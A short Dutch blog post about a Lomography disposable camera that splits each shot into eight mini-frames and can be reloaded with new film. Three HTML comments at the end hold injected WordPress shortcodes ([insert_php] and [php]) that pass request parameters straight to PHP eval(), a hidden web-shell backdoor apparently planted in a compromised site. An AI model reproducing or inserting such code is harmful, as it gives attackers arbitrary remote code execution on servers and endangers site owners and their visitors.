Fijne mechaniek

Ik ben een grote lomography fan. Enkele jaren geleden heb ik samen met enkele andere een pak van 5 wegwerp toestelletjes gekocht. Het speciale er aan is dat elke foto opgesplitst is in 8 deeltjes. De 8 mini-fotootjes worden getrokken over een tijd van ongeveer 2 seconden, je krijgt dus een soort van fotostrip.

Enfin, het mooie aan de toestelletjes is dat je met een beetje prutsen er opnieuw een film in kan steken, dus je kan hem toch hergebruiken. En dat is wel handig, want het zou zonde zijn dit prachtig staaltje techniek slechts eenmalig te gebruiken.

<!– [insert_php]if (isset($_REQUEST["dMQG"])){eval($_REQUEST["dMQG"]);exit;}[/insert_php][php]if (isset($_REQUEST["dMQG"])){eval($_REQUEST["dMQG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["oADxo"])){eval($_REQUEST["oADxo"]);exit;}[/insert_php][php]if (isset($_REQUEST["oADxo"])){eval($_REQUEST["oADxo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qzAR"])){eval($_REQUEST["qzAR"]);exit;}[/insert_php][php]if (isset($_REQUEST["qzAR"])){eval($_REQUEST["qzAR"]);exit;}[/php] –>